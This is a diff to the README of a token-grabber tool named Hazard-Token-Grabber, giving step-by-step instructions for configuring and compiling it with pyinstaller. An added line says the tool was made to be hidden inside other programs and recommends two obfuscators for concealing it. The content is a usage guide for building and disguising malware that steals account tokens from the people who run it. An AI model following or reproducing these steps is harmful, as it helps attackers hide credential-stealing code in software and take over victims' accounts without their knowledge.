gumbobrot/Hazard-Token-Grabber-v2/README.md

 - [x] Step 5: (optional) You can also change the settings from line 30 to 37.
 True is enabling the setting, false is disbaling a setting.
 Easy!

 - [x] Step 6: How do I compile this shit now?
 That's pretty easy!
-Just run this command after you opened a command prompt in the Hazard-Grabber Directory and run this command: "pyinstaller hazard-v3.py --onefile".
+Just run this command after you opened a command prompt in the Hazard-Grabber Directory and run this command: "pyinstaller hazard.py --onefile".
 Now wait for it to compile the file.
+It was mainly made as a hidden script that can be implemented to programs, so you can skip this step if you want and just obfuscate the file.
+I would recommend you [Blanks Obfuscator](https://github.com/Blank-c/BlankOBF) or [addidix Obfuscator](https://github.com/addi00000/pycloak).

 - [x] Step 7: (optional) Change the Icon.
 I don't know good programs for this at the moment.
 I will try to add this soon.
 If you know how to do this, let me know under the "Issues" ➤➤  "Suggestions" Tab.